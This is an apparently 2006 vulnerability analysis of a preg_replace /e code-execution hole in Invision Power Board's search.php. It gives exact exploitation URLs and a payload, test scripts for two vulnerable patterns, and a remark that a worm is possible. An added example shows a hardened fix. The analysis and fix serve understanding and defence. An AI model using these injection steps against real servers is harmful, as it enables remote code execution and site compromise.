IPB search.php vulnerability analysis and thoughts
#################################################
One vulnerability model can unearth a whole batch of vulnerabilities
The idea is what matters: preg_replace + /e
#################################################
Author: SuperHei_[At]_ph4nt0m.org
Blog: http://superhei.blogbus.com/
Team: http://www.ph4nt0m.org
Date: 2006-04-27
#############
##Simple analysis###
#############
The vulnerability is yet another preg_replace + /e vulnerability. The code is in \sources\action_admin\search.php, lines 1258-1262:
if ( $this->ipsclass->input['lastdate'] )
{
    $this->output = preg_replace( "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1 selected='selected'", $this->output );
}
}
The /e modifier is injected through the variable input['lastdate'], while $this->output carries the injected shellcode.
#############
##Use method###
#############
Register a user and post a message containing the following [shellcode]:
superheixxxxxxxeval(phpinfo()); //
Note the space between the final ; and the //.
Then click "Search" -> Search by Keywords: superheixxxxxxxeval [remember to choose "Show results as posts"].
You get a URL carrying the searchid:
http://127.0.0.1/ipb215/upload/inde…_in=posts&result_type=posts&highlite=superheixxxxxxxeval
Now append &lastdate=z|eval.*?%20//)%23e%00 (this is what supplies the [/e]) and submit; done:
http://127.0.0.1/ipb215/upload/inde…_in=posts&result_type=posts&highlite=superheixxxxxxxeval&lastdate=z|eval.*?%20//)%23e%00
#############
##Analysis of discussion###
#############
if ( $this->ipsclass->input['lastdate'] )
{
    $this->output = preg_replace( "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1 selected='selected'", $this->output );
}
}
The /e modifier is injected through the variable input['lastdate'], while $this->output carries the injected shellcode.
This analysis brings out an important detail. preg_replace takes three parameters, and with /e only the second one (the replacement) is executed as PHP code, yet in the statement above the shellcode appears to be submitted in the third one (the subject, $this->output).
Look again at the second parameter: \\1 selected='selected'. The \\1 is a backreference to whatever the first capture group of the regular expression matched, and it is substituted into the replacement before the replacement is evaluated. So, in the final analysis, the shellcode we submitted is still executed as the second parameter.
Why the particular shape? Because the lastdate we submit is z|eval.*?%20//)%23e%00: the capture group becomes (value=["']z|eval.*? //), so it matches from "eval" up to space+// in the page. The // is needed so that the " selected='selected'" appended by the replacement is commented out instead of breaking the PHP syntax. That is why the shellcode in the post must also end with space+//.
I think this should count as a vulnerability in PHP itself [like the earlier include null-byte truncation vulnerability]. To test it we wrote a simple model:
<?
$a = $_GET['a'];
echo preg_replace("#(value=[\"']z|eval.*?//)#e{$a}[\"'])#i", "\\1 ", "heigegegxxxxxxxeval(phpinfo());//");
?>
Submitting http://127.0.0.1/test2.php?a=2 directly gives an error:
Warning: Unknown modifier '2' in d:\easyphp\www\test2.php on line 3
Submitting http://127.0.0.1/test2.php?a=%002 executes phpinfo(): the null byte truncated the modifier list successfully. For the model to reach code execution magic_quotes_gpc must be off (with it on, the %00 arrives as a backslash followed by a zero and no longer truncates). But many web applications encode and decode variables themselves before using them, so they are not affected by the gpc setting; the IPB case above can be truncated even with gpc=on.
4. Construction of "lastdate=z|eval.*?%20//)%23e%00"
The eval and the %20// in $this->output serve as the start and end markers, so that \\1 captures exactly the PHP code to be executed.
This needs an authenticated (registered) account, but supposedly a program could be written to get past that?? Once that hurdle is cleared a worm is possible; after all, IPB has so many users...
#############
##Summary of the model###
#############
Mode 1: the second parameter of preg_replace (the replacement) is attacker-controlled and the pattern carries /e, so the submitted value is executed directly:
<?
$h = $_GET['h'];   // register_globals in the original
echo preg_replace("/test/e", $h, "just test");
?>
Submit http://127.0.0.1/test/11/preg.php?h=phpinfo()
Example: the phpBB viewtopic.php $highlight_match PHP code execution vulnerability.
Mode 2: the third parameter (the subject) is attacker-controlled and a backreference \\1 [or \\n] pulls the PHP code out of it into the replacement that /e evaluates:
<?
$h = $_GET['h'];
echo preg_replace("/\[php\]\s*(.*?)\s*\[\/php\]/ies", "\\1", $h);
?>
Submit http://127.0.0.1/test/11/preg.php?h=[php]phpinfo()[/php]
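A stand-alone PHP reproduction of the model, added here as an example and not taken from the advisory or from the IPB sources: the vulnerable call shape from search.php (mode 2, backreference into an evaluated replacement) beside a hardened version built on preg_quote() and preg_replace_callback(). The $output string, the option value and the lastdate value are constructed for the demo. The /e branch only fires on PHP builds of that era (later PHP 5 releases stop honouring the NUL byte in the modifier list and refuse the pattern, and PHP 7 removed /e entirely, returning NULL with a warning); the hardened branch runs on any PHP.

```php
<?php
// Added example (not from the original advisory or from IPB): the
// search.php pattern reduced to a script, beside a hardened version.
// All inputs below are constructed for this demo.

// Shape of the vulnerable call in search.php: untrusted $lastdate is
// interpolated into the pattern, and the /e that the attacker smuggles
// in makes PHP eval() the replacement, i.e. whatever \1 captured.
function render_lastdate_vulnerable($output, $lastdate)
{
    return preg_replace(
        "#(value=[\"']{$lastdate}[\"'])#i",
        "\\1 selected='selected'",
        $output
    );
}

// Hardened form: preg_quote() neutralises regex metacharacters and the
// '#' delimiter (so no group can be closed and no modifier appended),
// and preg_replace_callback() never evaluates data as code.
function render_lastdate_safe($output, $lastdate)
{
    $pattern = '#(value=["\']' . preg_quote($lastdate, '#') . '["\'])#i';
    return preg_replace_callback(
        $pattern,
        function ($m) { return $m[1] . " selected='selected'"; },
        $output
    );
}

// Constructed stand-in for $this->output: a <select> option plus a search
// hit whose body is the attacker's post (the "shellcode").
$output = "<option value='z'>z</option>\n"
        . "<p>superheixxxxxxxeval(phpinfo()); //</p>\n";

// The attacker's lastdate after URL decoding: closes the capture group,
// closes the '#' delimiter, appends the e modifier, then a NUL byte.
// Old PHP stopped parsing modifiers at the NUL, discarding the rest of
// the original pattern (["'])#i), so the effective pattern is
//     #(value=["']z|eval.*? //)#e
$lastdate = "z|eval.*? //)#e\0";

// Group 1 matches "eval(phpinfo()); //" and /e evaluates
//     eval(phpinfo()); // selected='selected'
// The trailing " //" in the post comments out the " selected='selected'"
// suffix, which is why the payload has to end in space+//.
echo render_lastdate_vulnerable($output, $lastdate);

// Same inputs through the hardened function: the value is matched
// literally, nothing in $output equals it, so the page comes back
// unchanged and nothing is evaluated.
var_dump(render_lastdate_safe($output, $lastdate) === $output);

// A legitimate value still works: value='z' is marked selected.
echo render_lastdate_safe($output, 'z');
```

On a vulnerable interpreter the first echo runs phpinfo(); on current PHP it emits a warning and prints nothing, while the two hardened calls print bool(true) and the <option> with selected='selected' added.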
Reference:
r57 exploit: http://www.milw0rm.com/exploits/1720
More information: http://www.google.com